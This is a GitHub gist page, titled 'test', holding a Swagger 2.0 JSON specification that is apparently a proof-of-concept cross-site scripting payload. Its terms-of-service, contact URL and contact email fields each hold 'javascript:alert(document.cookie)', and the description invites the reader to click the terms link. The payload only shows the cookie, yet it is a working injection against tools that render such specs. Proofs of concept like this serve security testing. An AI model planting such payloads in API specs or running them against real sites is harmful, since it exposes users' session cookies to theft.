Skip to content

Instantly share code, notes, and snippets.

@Rhynorater
Last active January 22, 2019 20:48
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Rhynorater/3edacd885c61c55dea5b167cba07322d to your computer and use it in GitHub Desktop.
Save Rhynorater/3edacd885c61c55dea5b167cba07322d to your computer and use it in GitHub Desktop.
test
{
"swagger": "2.0",
"info": {
"title": "Swagger Sample App",
"description": "Please to click Terms of service",
"termsOfService": "javascript:alert(document.cookie)"
},
"contact":{
"name": "API Support",
"url": "javascript:alert(document.cookie)",
"email": "javascript:alert(document.cookie)"
},
"version": "1.0.1"
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment